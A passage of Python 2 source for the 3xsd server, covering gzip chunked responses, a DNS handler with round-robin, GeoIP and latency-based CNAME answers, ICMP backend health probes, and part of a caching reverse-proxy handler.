_z_buf_size = _org_size - _gzip_pos
self.gzip_finished = True
_flush_mode = zlib.Z_FINISH
_org_file.seek(_gzip_pos)
_ss = _gzf.compress(_org_file.read(_z_buf_size))
_ss = ''.join([_ss, _gzf.flush(_flush_mode)])
_sss = ''.join([self.out_body_file, hex(len(_ss))[2:], '\r\n', _ss, '\r\n'])
if self.gzip_finished:
_sss = ''.join([_sss, '0\r\n\r\n'])
self.server._gzs.pop(self.xcache_key)
with self.server.gzip_shelf_lock:
self.server.gzip_shelf[self.xcache_key] = [_org_size, self.out_head_s, _sss, len(_sss), _file_lmt, _gzip_pos + _z_buf_size, self.gzip_finished, self.gzip_chunked]
#moved to self.server.check_3ws()
#if hasattr(self.server.gzip_shelf.dict, 'sync'):
# self.server.gzip_shelf.dict.sync()
#Now, transfer complete, resume nature behavior of TCP/IP stack, as turned before
if self.keep_connection == 1 and self.resume_transfer == 0:
#no need to set TCP_CORK when keep_connection=0
#it will be cleared when socket closing and data will be flushed
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 0)
elif self.resp_code == self.HTTP_NOT_MODIFIED:
self.send_out_all_headers()
elif self.resp_code == self.HTTP_OK and self.cmd_head == 1:
self.send_out_all_headers()
elif self.resp_code >= self.HTTP_BAD_REQUEST or self.resp_code == 201 or self.resp_code == 204:
self.send_out_all_headers(extra = "%d %s" % (self.resp_code, self.resp_msg))
def clean(self):
if self.transfer_completed == 1:
self.in_headers.clear()
self.out_headers.clear()
if self.keep_connection == 0:
self.sock.close()
def gevent_sendfile(out_fd, in_fd, offset, count):
	#This function is borrowed from gevent's example code, thanks!
	#Send exactly `count` bytes from in_fd starting at `offset`,
	#cooperatively yielding to the gevent hub whenever the socket
	#send buffer is full (EAGAIN). Returns the number of bytes sent.
	total = 0
	while total < count:
		try:
			total += o_sendfile(out_fd, in_fd, offset + total, count - total)
		except OSError as ex:
			if ex.args[0] != errno.EAGAIN:
				raise
			#buffer full - wait until out_fd is writable again
			gevent.socket.wait_write(out_fd)
	return total
class _xDNSHandler:
	"""DNS query handler of the 3nsd name server.

	Parses incoming A-type queries, answers them from in-memory
	resource-record tables (with optional GeoIP-based views and a
	"left-right" latency-measuring CNAME scheme) and keeps per-ip
	health state used by the icmp prober for failover.
	"""
	#parse/handle result codes
	PARSE_OK = 0
	PARSE_ERROR = -1
	xR_OK = 0
	xR_ERR_PARSE = -1
	xR_ERR_HANDLE = -2
	xResult = 0
	sock = None		#udp server socket shared by all events
	data = None		#raw payload of the query being handled
	addr = None		#(ip, port) of the querying peer
	rra = {}		#name -> list of answer ip strings
	rrn = {}		#name -> round-robin shift counter
	ttl = {}		#name -> ttl seconds of its records
	stat = {}		#ip -> [alive?, ttl, last-check-time] health state
	geo = {}		#name -> {continent/country code -> geo-view name}
	_rra = None		#rr list picked for the current query
	_ttl = None		#ttl picked for the current query
	q = None		#decoded dpkt.dns.DNS query object
	query_name = None	#name asked for by the current query
	query_name_geo = None	#query_name, possibly rewritten by GeoIP lookup
	answer = None		#serialized DNS answer to send back
	xcache_ttl = 10		#seconds a generated answer stays in xcache
	probe_interval = 10 #icmp probe interval in seconds, see if the ip alive
	#left-right latency-based range resolving state
	LR_LEFT = 0
	LR_RIGHT = 1
	lr_peers = {}		#peer ip -> [expire-time, left-rtt(a), right-rtt(b)]
	lr_ttl = 3600		#seconds a measured peer result is kept
	lr_left = ''		#name suffix serving the "left" range
	lr_right = ''		#name suffix serving the "right" range
	lr_range = ''		#default range to start measuring with
	lr_range_suffix = ''	#suffix marking names subject to range resolving
	lr_prefix = 'lr'	#label prefix of measuring cname names
	lr_resolve = False	#current query is a left-right resolve
	lr_left_measuring = False	#current query measures the left side
	lr_right_measuring = False	#current query measures the right side
	geoip_db = None		#geoip2.database.Reader, when configured
	def __init__(self, conn, client_address, server, config_section='3nsd'):
		"""Bind the handler to its server and load the named config section.

		conn and client_address are unused here; presumably kept for
		signature parity with the other handler classes - TODO confirm.
		"""
		self.server = server
		#if server.workers > 1:
		#	self._wlock = multiprocessing.Lock()
		#else:
		#	self._wlock = Semaphore()
		self.init_nsd_config(config_section=config_section)
	def init_nsd_config(self, config_section='3nsd'):
		"""(Re)load DNS serving config from 3xsd.conf.

		Fixed option names configure the left-right resolver and GeoIP;
		any other option line is a record: "name = ttl,ip[,ip...]".
		A name of the form "base@cc1/cc2" registers a GeoIP view.
		"""
		#for reload config
		#reset every table so a re-read starts from a clean slate
		self.ttl = {}
		self.rra = {}
		self.rrn = {}
		self.geo = {}
		self.lr_peers = {}
		self.lr_ttl = 3600
		self.lr_left = ''
		self.lr_right = ''
		self.lr_range = ''
		self.lr_range_suffix = ''
		self.lr_prefix = 'lr'
		self.lr_resolve = False
		self.lr_left_measuring = False
		self.lr_right_measuring = False
		self.geoip_db = None
		#config file is looked up in the working dir first, then /etc
		self.config = ConfigParser.ConfigParser()
		if not self.config.read('3xsd.conf'):
			self.config.read('/etc/3xsd.conf')
		for name, value in self.config.items(config_section):
			if name == "left":
				if value:
					self.lr_left = value.lower().strip()
			elif name == "right":
				if value:
					self.lr_right = value.lower().strip()
			elif name == "range":
				if value:
					self.lr_range = value.lower().strip()
			elif name == "range_suffix":
				if value:
					self.lr_range_suffix = value.lower().strip()
			elif name == "lr_ttl":
				if value:
					self.lr_ttl = int(value)
			elif name == "lr_prefix":
				if value:
					self.lr_prefix = value.lower().strip()
			elif name == "geoip_db":
				if value:
					self.geoip_db = geoip2.database.Reader(value)
			else:
				#record line: "ttl,ip[,ip...]"; lines without a comma are ignored
				v = value.split(',', 1)
				if len(v) > 1:
					# [ttl, ip, ...]
					if '@' in name:
						#geo view: map each country/continent code to this record name
						_name, _geo = name.lower().split('@')
						if _name not in self.geo:
							self.geo[_name] = {}
						for _cc in _geo.split('/'):
							if _cc:
								self.geo[_name][_cc] = name
					self.ttl[name] = int(v[0])
					self.rra[name] = self.ip_list(name, v[1], config_section)
					self.rrn[name] = 0
	def ip_list(self, name, ipstr, config_section):
		"""Expand a comma-separated ip spec into a list of ip (or ip:port)
		strings, registering each in self.stat as alive.

		Returns None (and clears self.stat) when the spec yields nothing.
		NOTE(review): for a config_section other than '3nsd'/'3zsd'/'3fsd',
		a ranged item ("a.b.c.x-y") leaves _port/_last unassigned and
		raises NameError - confirm only these three sections are used.
		"""
		#ip,ip,ip... can be the following format:   #lll
		#10.23.4.11 - single ip, 10.23.4.101-200 - multi ip
		a = ipstr.split(',')
		iplist = []
		t = time.time()
		for item in a:
			if item.find('-') < 0:
				#single ip (possibly with :port already attached)
				iplist.append(item)
				self.stat[item] = [True, self.ttl[name], t] #[stat, ttl, last-check-time]
			else:
				#ranged last octet, e.g. 10.23.4.101-200[:8000]
				_ip = item.split('.')
				if config_section == '3nsd':
					_port = None
					_last = _ip[3].split('-')
				elif config_section == '3zsd' or config_section == '3fsd':
					#10.23.4.101-200:8000
					__l = _ip[3].split(':')
					_port = __l[1]
					_last = __l[0].split('-')
				for i in range(int(_last[0]), int(_last[1])+1):
					ip = '.'.join([_ip[0], _ip[1], _ip[2], str(i)])
					if _port:
						ip = ''.join([ip, ':', _port])
					iplist.append(ip)
					self.stat[ip] = [True, self.ttl[name], t]
		if len(iplist) > 0:
			return iplist
		else:
			self.stat.clear()
			return None
def init_dns_handler(self):
self.data = None
self.addr = None
self._rra = None
self._ttl = None
self.q = None
self.query_name = None
self.query_name_geo = None
self.answer = None
	def __call__(self, events):
		"""Event entry point: drain the udp socket, answering each query.

		Loops until recvfrom raises EAGAIN (no more queued datagrams),
		then resets per-query state and returns.
		"""
		#found that one event can contains multi dns query packages, so use while loop instead of for
		while 1:
			try:
				self.data, self.addr = self.sock.recvfrom(1024)
				if self.x_parse_query() == self.PARSE_OK:
					if not self.lr_resolve:
						#plain A answer from the rr tables
						self.x_gen_answer()
					else:
						#left-right latency-measuring resolve
						self.x_lr_resolve()
					self.x_send_out()
				else:
					self.xResult = self.xR_ERR_PARSE
			except socket.error as e:
				if e.errno == errno.EAGAIN:
					#socket drained - reset state and yield
					self.init_dns_handler()
					break
				else:
					raise
def shift(self, alist, n):
if len(alist) == 1:
return alist
else:
_n = n % len(alist)
return alist[_n:] + alist[:_n]
	def x_check_range_resolve(self):
		"""Decide whether the current query belongs to left-right range
		resolving; primes self.lr_peers for the peer when it does.

		NOTE(review): when lr_left/lr_right are unset (''), the suffix
		substring tests below are always True and only the lr_prefix
		check gates the match - confirm served names can never start
		with lr_prefix by accident.
		"""
		#check if it's a left-right range resolving name
		self.lr_resolve = self.lr_left_measuring = self.lr_right_measuring = False
		#a range name must resolve via the special placeholder rr '0.0.0.0'
		if self.lr_range_suffix in self.query_name[0-len(self.lr_range_suffix):] and self._rra and self._rra[0] == '0.0.0.0':
			self.lr_resolve = True
		#measuring names carry the lr_prefix label and the side's suffix
		if self.lr_left in self.query_name[0-len(self.lr_left):] and self.lr_prefix in self.query_name[:len(self.lr_prefix)]:
			self.lr_resolve = True
			self.lr_left_measuring = True
		if self.lr_right in self.query_name[0-len(self.lr_right):] and self.lr_prefix in self.query_name[:len(self.lr_prefix)]:
			self.lr_resolve = True
			self.lr_right_measuring = True
		if self.lr_resolve:
			_peer, _ = self.addr
			if _peer not in self.lr_peers:
				self.lr_peers[_peer] = [int(time.time()) + self.lr_ttl, 0, 0] #[ttl, left-rtt,right-rtt], also as [ttl, a,b]
		return self.lr_resolve
	def x_check_peer_geo(self): #cpcp
		"""Rewrite self.query_name_geo to the GeoIP view matching the peer.

		Continent code is checked first, then the country iso_code (so a
		country match overrides a continent match). Any lookup failure is
		swallowed and the plain query_name stays in effect.
		"""
		if self.geoip_db:
			try:
				_rs = self.geoip_db.country(self.addr[0])
				_cc = None
				#the country code(_cc), first match continent code, then country's iso_code
				if hasattr(_rs.continent, "code"):
					_cc = _rs.continent.code.lower()
					if _cc in self.geo[self.query_name]:
						self.query_name_geo = self.geo[self.query_name][_cc]
				if hasattr(_rs.country, "iso_code"):
					_cc = _rs.country.iso_code.lower()
					if _cc in self.geo[self.query_name]:
						self.query_name_geo = self.geo[self.query_name][_cc]
				#city has not iso_code, so what's next?
				#if hasattr(_rs.city, "iso_code"):
				#	print "peer city code:", _rs.city.iso_code
				#elif hasattr(_rs.city, "name"):
				#	print "peer city name:", _rs.city.name
				#NOTE(review): debug leftover below prints on every geo query (python2 print)
				print "peer:", self.addr[0], "geo:", self.query_name_geo, "cc:", _cc
			except:
				pass
	def x_parse_query(self): #pqpq
		"""Decode self.data as a DNS query and pick the rr/ttl config for it.

		Returns PARSE_OK when the name is served (or is a left-right
		range resolve), PARSE_ERROR otherwise. Only IN/A queries accepted.
		"""
		self.q = dpkt.dns.DNS(self.data)
		#we accept just A type query
		if self.q.qd[0].cls != dpkt.dns.DNS_IN or self.q.qd[0].type != dpkt.dns.DNS_A:
			return self.PARSE_ERROR
		self.query_name = self.query_name_geo = self.q.qd[0].name
		if self.query_name in self.geo:
			#geo view configured for this name: may rewrite query_name_geo
			self.x_check_peer_geo()
			self._rra = self.rra.get(self.query_name_geo)
			self._ttl = self.ttl.get(self.query_name_geo)
		else:
			self._rra = self.rra.get(self.query_name)
			self._ttl = self.ttl.get(self.query_name)
		if self.x_check_range_resolve():
			#It's a left-right range resolve
			return self.PARSE_OK
		elif self._rra is not None and self._ttl is not None:
			#ok, rr & ttl config found
			return self.PARSE_OK
		else:
			#not my serving domain name
			return self.PARSE_ERROR
	def x_lr_resolve(self): #lrlr
		"""Drive the left-right latency measurement state machine.

		Each peer entry in self.lr_peers is [expire-time, a, b] where a/b
		are the measured rtts (msecs) of the left/right side. Depending on
		which values are known, this either answers with the final range
		cname (x_lr_range) or with a measuring cname (x_lr_cname) that
		encodes peer ip and timestamps for the next round-trip.
		"""
		_peer = self.addr[0]
		_ttl, a, b = self.lr_peers[_peer]
		_t = time.time() #_t: current time
		#print "---------------------"
		#print _peer, self.lr_peers[_peer]
		if _t <= _ttl:
			#cache of a,b not expired
			if a > 0 and b > 0:
				self.x_lr_range(a, b, ch=True) #ch = cache hit
				return
		else:
			#cache of a,b expired
			_ttl = int(_t) + self.lr_ttl
			a = b = 0
			self.lr_peers[_peer] = [_ttl, a, b]
		if self.lr_left_measuring:
			#doing left measure
			#name label carries: peer-ip(packed int), ts0, ts1, ts2
			_speer0, _sts0, _sts1, _sts2 = self.query_name.split('.')[0].split('-')[1:]
			_ts0, _ts1, _ts2 = (int(_sts0), int(_sts1), int(_sts2))
			_peer0 = socket.inet_ntoa(struct.pack('!I', int(_speer0)))
			if _peer0 not in self.lr_peers:
				self.lr_peers[_peer0] = [int(_t) + self.lr_ttl, 0, 0]
			if _ts2 > 0:
				#right-side rtt already measured, record it for both peers
				b = self.lr_peers[_peer][2] = self.lr_peers[_peer0][2] = _ts2
			if a == 0:
				if _ts1 == 0:
					#start the left measurement round-trip
					self.x_lr_cname(self.LR_LEFT, _ts0, int((_t - _ts0) * 1000), _ts2)
					return
				else:
					#ts1 holds either the start offset (large) or the rtt itself
					a = self.lr_peers[_peer][1] = self.lr_peers[_peer0][1] = int((_t - _ts0) * 1000) - _ts1 if _ts1>300000 else _ts1
			if b == 0:
				self.x_lr_cname(self.LR_RIGHT, _ts0, a, 0)
			elif a > 0 and b > 0:
				if a < _ts1:
					#for debug purpose
					self.x_lr_cname(self.LR_LEFT, _ts0, a, b)
				else:
					self.x_lr_range(a, b)
		elif self.lr_right_measuring:
			#doing right measure (mirror of the left branch)
			_speer0, _sts0, _sts1, _sts2 = self.query_name.split('.')[0].split('-')[1:]
			_ts0, _ts1, _ts2 = (int(_sts0), int(_sts1), int(_sts2))
			_peer0 = socket.inet_ntoa(struct.pack('!I', int(_speer0)))
			if _peer0 not in self.lr_peers:
				self.lr_peers[_peer0] = [int(_t) + self.lr_ttl, 0, 0]
			if _ts1 > 0:
				a = self.lr_peers[_peer][1] = self.lr_peers[_peer0][1] = _ts1
			if b == 0:
				if _ts2 == 0:
					self.x_lr_cname(self.LR_RIGHT, _ts0, _ts1, int((_t - _ts0) * 1000))
					return
				else:
					b = self.lr_peers[_peer][2] = self.lr_peers[_peer0][2] = int((_t - _ts0) * 1000) - _ts2 if _ts2>300000 else _ts2
			if a == 0:
				self.x_lr_cname(self.LR_LEFT, _ts0, 0, b)
			elif a > 0 and b > 0:
				if b < _ts2:
					#for debug purpose
					self.x_lr_cname(self.LR_RIGHT, _ts0, a, b)
				else:
					self.x_lr_range(a, b)
		else:
			#doing initial query
			#_ts0: base time stamp, in secs
			_ts0 = int(_t - 300)
			#_ts: offset time stamp from base time, in msecs
			_ts = int((_t - _ts0) * 1000)
			if self.lr_range == 'left':
				#left
				if a == 0 and b == 0:
					#nothing measured yet: alternate which side goes first
					if _ts0 % 2:
						self.x_lr_cname(self.LR_LEFT, _ts0, _ts)
					else:
						self.x_lr_cname(self.LR_RIGHT, _ts0, 0, 0)
				elif a == 0: #b > 0
					self.x_lr_cname(self.LR_LEFT, _ts0, _ts, b)
				elif b == 0: #a > 0
					self.x_lr_cname(self.LR_RIGHT, _ts0, a, 0)
				else: #a > 0, b > 0
					self.x_lr_range(a, b, ch=True)
			else:
				#right
				if a == 0 and b == 0:
					if _ts0 % 2:
						self.x_lr_cname(self.LR_RIGHT, _ts0, 0, _ts)
					else:
						self.x_lr_cname(self.LR_LEFT, _ts0, 0, 0)
				elif b == 0: #a > 0
					self.x_lr_cname(self.LR_RIGHT, _ts0, a, _ts)
				elif a == 0: #b > 0
					self.x_lr_cname(self.LR_LEFT, _ts0, 0, b)
				else: #a > 0, b > 0
					self.x_lr_range(a, b, ch=True)
	def x_lr_range(self, a, b, ch=False): #lrlr
		"""Answer with the final range CNAME, picking the faster side.

		a/b are the measured left/right rtts; ch=True marks a cache hit,
		which also gives the cname a real ttl instead of 0.
		"""
		if self.lr_left_measuring:
			#strip the measuring label, switch side if right was faster
			_cname = self.query_name[self.query_name.find('.')+1:]
			if a > b:
				_cname = _cname.replace(self.lr_left, self.lr_right)
		elif self.lr_right_measuring:
			_cname = self.query_name[self.query_name.find('.')+1:]
			if a < b:
				_cname = _cname.replace(self.lr_right, self.lr_left)
		else:
			#initial query answered from cache: map suffix to the chosen side
			if self.lr_range == 'left':
				_cname = self.query_name.replace(self.lr_range_suffix, self.lr_left)
			elif self.lr_range == 'right':
				_cname = self.query_name.replace(self.lr_range_suffix, self.lr_right)
		#gen cname answer
		self.q.op = dpkt.dns.DNS_RA
		self.q.rcode = dpkt.dns.DNS_RCODE_NOERR
		self.q.qr = dpkt.dns.DNS_R
		arr = dpkt.dns.DNS.RR()
		arr.cls = dpkt.dns.DNS_IN
		arr.type = dpkt.dns.DNS_CNAME
		arr.name = self.query_name
		arr.cname = _cname
		#NOTE(review): self.ttl is keyed by config record names - confirm
		#cname targets are also configured so the .get() does not fall to 0
		arr.ttl = 0 if not ch else self.ttl.get(_cname, 0)
		self.q.an.append(arr)
		#I haven't understand what the Authority Record is going on..
		if self.q.ar: del self.q.ar[:]
		self.answer = str(self.q)
	def x_lr_cname(self, _range, ts0, ts1, ts2=0): #lrlr
		"""Answer with a measuring CNAME that encodes peer ip + timestamps.

		The client will chase the cname to the chosen side's name server,
		and the timestamps come back in the next query's first label.
		"""
		#query_name: ga.i.3xsd.net
		#cname: ts0-ts1-ts2.ga.l.3xsd.net
		#ts0: base time, in secs
		#ts1: a measure time start point if ts2 = 0, or rtt of a if ts2 > 0, in msecs from base time
		#ts2: b measure time start point if ts3 = 0, or rtt of b if ts3 > 0, in msecs from base time
		if self.lr_right_measuring or self.lr_left_measuring:
			#already measuring: drop the old measuring label first
			_query_name = self.query_name[self.query_name.find('.')+1:]
		else:
			_query_name = self.query_name
		if _range == self.LR_LEFT:
			if self.lr_right_measuring:
				_query_name = _query_name.replace(self.lr_right, self.lr_left)
			else:
				_query_name = _query_name.replace(self.lr_range_suffix, self.lr_left)
		elif _range == self.LR_RIGHT:
			if self.lr_left_measuring:
				_query_name = _query_name.replace(self.lr_left, self.lr_right)
			else:
				_query_name = _query_name.replace(self.lr_range_suffix, self.lr_right)
		#[prefix, peer_ip, ts0, ts1, ts2]
		_cname = ''.join([self.lr_prefix, '-', str(struct.unpack('!I', socket.inet_aton(self.addr[0]))[0]), '-', str(ts0), '-', str(ts1), '-', str(ts2), '.', _query_name])
		#gen cname answer
		self.q.op = dpkt.dns.DNS_RA
		self.q.rcode = dpkt.dns.DNS_RCODE_NOERR
		self.q.qr = dpkt.dns.DNS_R
		arr = dpkt.dns.DNS.RR()
		arr.cls = dpkt.dns.DNS_IN
		arr.type = dpkt.dns.DNS_CNAME
		arr.name = self.query_name
		arr.cname = _cname
		#ttl 0: measuring cnames must never be cached by resolvers
		arr.ttl = 0
		self.q.an.append(arr)
		#I haven't understand what the Authority Record is going on..
		if self.q.ar: del self.q.ar[:]
		self.answer = str(self.q)
	def x_gen_answer(self): #gaga
		"""Build (or reuse from xcache) the A answer for the current query.

		A cached answer is replayed with only its 2-byte id rewritten to
		match the current query. Otherwise rr records are generated for
		every alive ip (round-robin shifted), falling back to the backup
		record "_name" when all ips are marked down.
		"""
		if self.query_name_geo in self.server.xcache:
			_c = self.server.xcache.get(self.query_name_geo)
			if _c[0] > time.time():
				#cache item not expired, load it and rewrite the id field of answer to match queryer's
				if self.q.id < 255:
					self.answer = ''.join(['\x00', chr(self.q.id), _c[1][2:]])
				else:
					self.answer = ''.join([chr(self.q.id/256), chr(self.q.id % 256), _c[1][2:]])
				return
			else:
				#expired, clear it
				self.server.xcache.pop(self.query_name_geo)
		#cache not hit, go on handling: first to turn query into answer
		self.q.op = dpkt.dns.DNS_RA
		self.q.rcode = dpkt.dns.DNS_RCODE_NOERR
		self.q.qr = dpkt.dns.DNS_R
		_alive = 0
		#if not a geo resolving, self.query_name_geo is just equal to self.query_name, set by x_parse_query()
		_query_name = self.query_name_geo
		#for round robbin, shift ip list every time
		self._rra = self.shift(self.rra.get(_query_name), self.rrn.get(_query_name))
		self.rrn[_query_name] = (self.rrn[_query_name] + 1) % len(self.rra.get(_query_name))
		#gen rr records for A resolve
		while _alive == 0:
			for _ip_s in self._rra:
				#append rr record with ip not down
				__stat = self.stat.get(_ip_s)
				_stat = __stat[0]
				if not _stat:
					continue
				else:
					_alive += 1
				arr = dpkt.dns.DNS.RR()
				arr.cls = dpkt.dns.DNS_IN
				arr.type = dpkt.dns.DNS_A
				arr.name = self.query_name
				arr.ip = socket.inet_aton(_ip_s)
				arr.ttl = self._ttl
				self.q.an.append(arr)
			if _alive == 0:
				#all ip go down, failover to backup config
				_query_name = ''.join(['_', _query_name])
				if self.rra.get(_query_name) is None:
					break #backup go down too, just break and return empty answer
				self._rra = self.shift(self.rra.get(_query_name), self.rrn.get(_query_name))
				#unbounded increment is harmless: shift() takes n % len internally
				self.rrn[_query_name] += 1
				self._ttl = self.ttl.get(_query_name)
		#I haven't understand what the Authority Record is going on..
		if self.q.ar: del self.q.ar[:]
		self.answer = str(self.q)
		#cache it, when expired at one ttl
		self.server.xcache[self.query_name_geo] = [self.xcache_ttl + time.time(), self.answer]
def x_send_out(self):
#self._wlock.acquire()
try:
#send out answer, seems sending without mutex lock is ok
self.sock.sendto(self.answer, self.addr)
except:
raise
#finally:
#self._wlock.release()
	def probe_ips(self):
		"""Background greenlet loop: icmp-probe every tracked backend ip.

		Every probe_interval seconds, spawn one icmp_ping greenlet per ip
		whose health record is older than its ttl, and wait for them all.
		Runs forever; never returns.
		"""
		gs = []
		while 1:
			gevent.sleep(self.probe_interval)
			if len(self.stat) > 0:
				if len(gs) > 0:
					del gs[:]
				for ip in self.stat.keys():
					#'0.0.0.0' is the range-resolve placeholder, never probed
					if ip == '0.0.0.0': continue
					if time.time() > self.stat[ip][2] + self.stat[ip][1]: #last-check + ttl
						gs.append(gevent.spawn(self.icmp_ping, ip)) #do works concurrently
				gevent.joinall(gs)
				#print "lr_peers:", self.lr_peers
				#print "-------------------"
				#print "self.rra: ", self.rra
				#print "self.geo: ", self.geo
	def icmp_ping(self, ip):
		"""Probe one ip with up to two icmp echo requests.

		Updates self.stat[ip] (alive flag + last-check time) and returns
		True when any echo reply arrived. Uses gevent sockets so probes
		run concurrently; raw sockets require root.
		"""
		#be sure to be a gevent.socket, for concurrent reason
		sock = gevent.socket.socket(gevent.socket.AF_INET, gevent.socket.SOCK_RAW, 1) #raw socket requiries root privilege
		#gevent >= 1.0 changed the connect() signature for raw sockets
		if StrictVersion(gevent.__version__) >= StrictVersion('1.0'):
			sock.connect((ip, None))
		else:
			sock.connect((ip, 1))
		sock.settimeout(1)
		rcvd = 0
		for i in xrange(2): #send icmp ping tests
			icmp = dpkt.icmp.ICMP(type=8, data=dpkt.icmp.ICMP.Echo(id=random.randint(0, 0xffff),
							seq=i, data='3nsd probe'))
			try:
				sock.send(str(icmp))
				r = sock.recv(1024)
				rip = dpkt.ip.IP(r)
				#only count replies actually coming from the probed ip
				if gevent.socket.inet_ntoa(rip.src) == ip:
					ricmp = dpkt.icmp.ICMP(str(rip.data))
					#icmp type 0 = echo reply
					if ricmp.type == 0:
						rcvd += 1
			except gevent.socket.timeout:
				pass
			if rcvd > 0:
				break
		sock.close()
		self.stat[ip][2] = time.time()
		if rcvd == 0: #ip down
			self.stat[ip][0] = False
			return False
		else: #ip alive
			self.stat[ip][0] = True
			return True
class _xZHandler(_xHandler, _xDNSHandler):
	"""Reverse-proxy / load-balancing handler of 3zsd.

	Combines the http handler (_xHandler) with the backend tables of
	_xDNSHandler: requests are matched to backends per hostname, with
	round-robin, ip-hash or url-hash scheduling, plus response caching.
	"""
	Z_RR = 0 #round robin
	Z_IP = 1 #ip hash
	Z_URL = 2 #url hash
	None2 = [None, None]	#convenience pair for empty cb_conns lookups
	_f = None #socket fileno
	z_cache_size = 1000 #limit the xcache size in mem, about 30MB size with average file size 30KB
	z_idle_ttl = 20 #backend connections have a idle timeout of 20 seconds
	z_xcache_shelf = False #persistent storage of xcache
	z_shelf_size = 1000000 #1 million files on-disk cache, about 30GB disk size with average file size 30KB
	transparent_proxy = False	#True when a '*' backend entry serves any hostname
	tp_host = {}	#hostname -> {'ip', 'expire-time'} resolve cache (transparent mode)
	def __init__(self, conn, client_address, server, native_epoll=True,
					gevent_stream=False, recv_buf_size=16384, send_buf_size=65536, z_mode=0):
		"""Set up http handling, backend tables and (optionally) the
		persistent xcache shelf.

		NOTE(review): Z_mode and X_shelf are module-level config globals
		set elsewhere in this file - confirm they are defined before any
		handler is constructed.
		"""
		_xHandler.__init__(self, conn, client_address, server, native_epoll, gevent_stream, recv_buf_size, send_buf_size)
		self.server_pipelining = False
		#module-level Z_mode overrides the constructor argument when larger
		if Z_mode > z_mode:
			z_mode = Z_mode
		if z_mode >= 0:
			_xDNSHandler.__init__(self, conn, client_address, server, config_section='3zsd')
			if '*' in self.rra.keys():
				self.transparent_proxy = True
			self.z_mode = z_mode
		else:
			self.z_mode = 0
		if X_shelf == 1:
			#persistent on-disk response cache, shared via the server object
			self.z_xcache_shelf = True
			self.server.xcache_shelf = shelve.open('shelf.xcache', writeback=True)
			self.server.xcache_shelf_lock = multiprocessing.Lock()
def init_zsd_config(self, config_section='3zsd'):
_xHandler.init_config(self)
_xDNSHandler.init_nsd_config(self, config_section=config_section)
if '*' in self.rra.keys():
self.transparent_proxy = True
	def init_handler(self, conn, client_address, rw_mode=0):
		"""Reset per-event state, restoring any suspended transfer context.

		rw_mode: 0 from-client, 1 to-client, 2 from-backend, 3 to-backend;
		for modes > 0 the hostname/path/request are restored from server
		tables keyed by the connection fileno.
		"""
		_xHandler.init_handler(self, conn, client_address, rw_mode)
		self.z_hostname = self.z_backends = self.z_host_addr = self.z_host_sock = None
		#'chuncked_encoding' [sic] - misspelled attribute name is used as-is elsewhere
		self.z_header_length = self.z_finished = self.z_body_size = self.chuncked_encoding = self.transfer_completed = 0
		self.response_headers_parsed = False
		if conn:
			if self._f in self.server.xcache_stat:
				#a cached response was already matched for this fileno
				self.xcache_hit = True
				self.xcache_key = self.server.xcache_stat[self._f]
			if rw_mode > 0:
				_n = conn.fileno()
				if _n in self.server.k_conns:
					self.r_http_ver, self.keep_connection = self.server.k_conns[_n]
				self.path = self.server.c_path.get(_n)
				self.z_hostname = self.server.zhosts.get(_n)
				self._r = self.server.z_reqs.get(_n)
				if rw_mode > 1:
					#backend-side event: restore the backend socket/address
					self.z_host_sock = self.server.zconns.get(self._f)
					self.z_host_addr = self.server.zaddrs.get(self._f)
		else:
			return
	def z_check_xcache(self, _f):
		"""Look up the current request in the response cache (mem + shelf).

		Tries encoding-specific keys ("gzip:<key>" etc. from the client's
		Accept-Encoding) before the plain key; a shelf hit is promoted
		into the in-memory xcache. On a fresh hit the response fields and
		resp_line are loaded and self.xcache_hit is set.
		"""
		#conditional requests and no-cache requests bypass the cache entirely
		if self.if_modified_since == 0 and self.in_headers.get("Cache-Control", "null").find("no-cache") < 0:
			_key_found = _in_shelf = False
			self.accept_encoding = self.in_headers.get("Accept-Encoding")
			if self.accept_encoding:
				for x in self.accept_encoding.replace(' ','').split(','):
					_key = ''.join([x, ':', self.xcache_key])
					if _key in self.server.xcache:
						_key_found = True
						self.xcache_key = _key
						break
					elif self.z_xcache_shelf and _key in self.server.xcache_shelf:
						_key_found = True
						_in_shelf = True
						self.xcache_key = _key
						break
			if not _key_found:
				if self.xcache_key in self.server.xcache:
					_key_found = True
				elif self.z_xcache_shelf and self.xcache_key in self.server.xcache_shelf:
					_key_found = True
					_in_shelf = True
			if _key_found:
				if not _in_shelf:
					self._c = self.server.xcache.get(self.xcache_key)
				else:
					#promote the shelved item into the in-memory cache
					self._c = self.server.xcache[self.xcache_key] = self.server.xcache_shelf.get(self.xcache_key)
				ttl = self._c[0]
				if ttl >= time.time():
					#cache hit
					self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap = self._c[1:]
					self.has_resp_body = True
					self.xcache_hit = True
					self.server.xcache_stat[_f] = self.xcache_key
					if self.r_http_ver == self.HTTP11:
						self.resp_line = 'HTTP/1.1 200 OK'
					else:
						self.resp_line = 'HTTP/1.0 200 OK'
					return
				else:
					#cache item expired
					self._c = None
					if not _in_shelf:
						self.server.xcache.pop(self.xcache_key)
					else:
						try:
							del self.server.xcache_shelf[self.xcache_key]
						except:
							#may be problem in concurrent mode
							pass
					if _f in self.server.xcache_stat:
						self.server.xcache_stat.pop(_f)
				self.xcache_hit =False
			else:
				self.xcache_hit =False
	def __call__(self, fds):
		"""Epoll event dispatcher of the proxy.

		fds is a list of (fileno, rw_mode) pairs:
		  0 - request arriving from a client
		  1 - response resuming towards a client
		  2 - data arriving from a backend
		  3 - request resuming towards a backend
		After each event, the handler state is cleaned unless the
		transfer is still in flight (_do_clean False).
		"""
		for f, rw_mode in fds:
			self._f = f
			_do_clean = True
			if rw_mode == 0: #ccc
				#from client, resume_transfer = 0
				#print "0 c->s" #client to server
				self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
				parse_stat = self.x_parse()
				if parse_stat == self.PARSE_OK:
					self.server.k_conns[f] = [self.r_http_ver, self.keep_connection]
					self.server.c_path[f] = self.path
					if self.cmd_get == 1 or self.cmd_head == 1:
						self.z_check_xcache(self._f)
						if self.xcache_hit:
							#serve straight from cache, no backend involved
							self.x_response()
						else:
							self.z_GET_init()
							if self.xResult < 0:
								#something wrong
								if self.xResult == self.xR_ERR_5xx:
									#backend error
									self.x_response()
								else:
									_do_clean = False
					elif self.cmd_put == 1 or self.cmd_delete == 1:
						#PUT/DELETE only supported by subclasses providing z_PUT_init
						if hasattr(self, "z_PUT_init"):
							self.z_PUT_init()
							if self.xResult < 0:
								if self.xResult == self.xR_ERR_5xx:
									self.x_response()
								else:
									_do_clean = False
						else:
